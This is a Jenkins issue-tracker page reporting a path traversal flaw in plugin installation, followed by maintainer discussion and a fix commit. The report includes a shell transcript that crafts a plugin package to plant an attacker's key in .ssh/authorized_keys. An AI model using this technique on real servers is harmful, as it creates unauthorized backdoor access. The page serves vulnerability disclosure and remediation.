Uploaded image for project: 'Jenkins'
  1. Jenkins
  2. JENKINS-32778

Jenkins plugin installation path traversal vulnerability

    XMLWordPrintable

    Details

    • Type: Improvement
    • Status: Resolved (View Workflow)
    • Priority: Minor
    • Resolution: Fixed
    • Component/s: core
    • Labels:
    • Environment:
      Platforms: Jenkins
      Versions: 1.622
    • Similar Issues:

      Description

      Submitting as delegate for a Cisco pen-testing team
      A vulnerability in the package installation process of Jenkins could all an authenticated, remote attacker to affect a path traversal attack.

      The vulnerability is due to unsafe unpacking operations. An attacker could exploit this vulnerability by crafting a malicious plugin package and installing it themselves, or tricking a victim to install it on their Jenkin's instance. An exploit could allow the attacker to write or overwrite files with elevated privileges, which could allow backdoor access, or a denial of service (DoS) condition.

      Headline: Path traversal during Jenkins plugin installation
      Platforms: Jenkins
      Versions: 1.622
      CWE Tags: CWE-25, CWE-541

      Jenkins allows administrators to install plugins that extend the core
      functionality of the system. Plugins are distributed in a single-file package
      (essentially a 'zip'/'jar' file) that is expanded at installation time. The
      process that expands plugin packages during installation contains a path
      traversal vulnerability that allows a malicious plugin package to write files to
      arbitrary locations on the underlying filesystem. This includes creating new
      files and directories and overwriting existing files.

      For example, a plugin package could overwrite Jenkins system configuration files
      or cryptographic secrets. It could create new users or jobs by writing new
      user/job configuration files. It could even create/overwrite an OS user's
      '.ssh/authorized_keys' file, thus creating a backdoor that may allow the
      attacker to SSH into the Jenkins server.

      Consider the following shell transcript illustrating how an attacker could
      create a malicious package that installs an attacker controlled SSH key.

      $ mkdir -p .ssh one/two

      $ ssh-keygen -t rsa -b 1024 -N "" -C jenkins -f .ssh/jenkins.id_rsa
      Generating public/private rsa key pair.
      Your identification has been saved in ./jenkins.id_rsa.
      Your public key has been saved in ./jenkins.id_rsa.pub.
      The key fingerprint is:
      96:6b:2e:0a:bb:07:d5:8d:97:b7:70:bb:4e:65:3f:bb jenkins
      The key's randomart image is:
      -[ RSA 1024]---

       
       
      . o .
      . o =.o
      . .S+ oo
      . . .oo .
      .. o .. o
      o. .o .. o
      oo.. .... E.

      -----------------

      $ ln -s jenkins.id_rsa.pub .ssh/authorized_keys

      $ jar cvf ssh_backdoor.hpi -C one/two/ ../../.ssh/authorized_keys
      added manifest
      adding: ../../.ssh/authorized_keys(in = 221) (out= 198)(deflated 10%)

      Note, the 'ssh_backdoor.hpi' plugin described above has been confirmed to
      successfully create an SSH backdoor on Jenkins 1.622 running on Ubuntu Linux
      (default installation via aptitude). Obviously, differences in installation
      paths and filesystem layout could affect the applicability of this example to
      other platforms.

      Clearly the behavior described above should not be permitted. To protect
      against such attacks, Jenkins developers should ensure that plugins are
      unpackaged and installed in isolated portions of the filesystem.

      References:
      http://cwe.mitre.org/data/definitions/25.html
      http://cwe.mitre.org/data/definitions/641.html

        Attachments

          Activity

          Hide
          danielbeck Daniel Beck added a comment -

          Anyone opposed to just moving this to JENKINS? It seems consensus here is that it's not an exploitable bug (if you get someone to install your maliciously crafted plugin, they have a problem anyway), so keeping the information on this private would be unnecessary.

          Show
          danielbeck Daniel Beck added a comment - Anyone opposed to just moving this to JENKINS? It seems consensus here is that it's not an exploitable bug (if you get someone to install your maliciously crafted plugin, they have a problem anyway), so keeping the information on this private would be unnecessary.
          Hide
          jglick Jesse Glick added a comment -

          consider a new feature that allowed an administrator to upload an 'skin' package that changed colors, logos, style sheets, etc. Such a package wouldn't run any code after installation, but depending on the implementation it may reuse this code that unpackages 'jar'/'zip' files.

          I would not recommend that such a feature be created, but if it were (as a plugin on the update site), it would be the responsibility of the plugin author to ensure that all submitted ZIP files were treated as potentially malicious and the contents checked accordingly. If and when such a feature is created and the author is negligent about security and someone discovers this, file a SECURITY report and the plugin can be either fixed or blacklisted.

          Show
          jglick Jesse Glick added a comment - consider a new feature that allowed an administrator to upload an 'skin' package that changed colors, logos, style sheets, etc. Such a package wouldn't run any code after installation, but depending on the implementation it may reuse this code that unpackages 'jar'/'zip' files. I would not recommend that such a feature be created, but if it were (as a plugin on the update site), it would be the responsibility of the plugin author to ensure that all submitted ZIP files were treated as potentially malicious and the contents checked accordingly. If and when such a feature is created and the author is negligent about security and someone discovers this, file a SECURITY report and the plugin can be either fixed or blacklisted.
          Hide
          oleg_nenashev Oleg Nenashev added a comment -

          Reopening since we agreed to merge https://github.com/jenkinsci/jenkins/pull/3402
          It is not considered as a security defect tho

          Show
          oleg_nenashev Oleg Nenashev added a comment - Reopening since we agreed to merge https://github.com/jenkinsci/jenkins/pull/3402 It is not considered as a security defect tho
          Hide
          scm_issue_link SCM/JIRA link daemon added a comment -

          Code changed in jenkins
          User: aviadatsnyk
          Path:
          core/src/main/java/hudson/FilePath.java
          http://jenkins-ci.org/commit/jenkins/8ede53387ec060a7c343e32efe808b1016f0c10c
          Log:
          JENKINS-32778 - Prevent extracting archived plugins outside of target path (#3402)

          *NOTE:* This service been marked for deprecation: https://developer.github.com/changes/2018-04-25-github-services-deprecation/

          Functionality will be removed from GitHub.com on January 31st, 2019.

          Show
          scm_issue_link SCM/JIRA link daemon added a comment - Code changed in jenkins User: aviadatsnyk Path: core/src/main/java/hudson/FilePath.java http://jenkins-ci.org/commit/jenkins/8ede53387ec060a7c343e32efe808b1016f0c10c Log: JENKINS-32778 - Prevent extracting archived plugins outside of target path (#3402) * NOTE: * This service been marked for deprecation: https://developer.github.com/changes/2018-04-25-github-services-deprecation/ Functionality will be removed from GitHub.com on January 31st, 2019.
          Hide
          danielbeck Daniel Beck added a comment -

          Fixed in 2.120.

          Show
          danielbeck Daniel Beck added a comment - Fixed in 2.120.

            People

            • Assignee:
              Unassigned
              Reporter:
              crlorent Craig Lorentzen
            • Votes:
              0 Vote for this issue
              Watchers:
              7 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: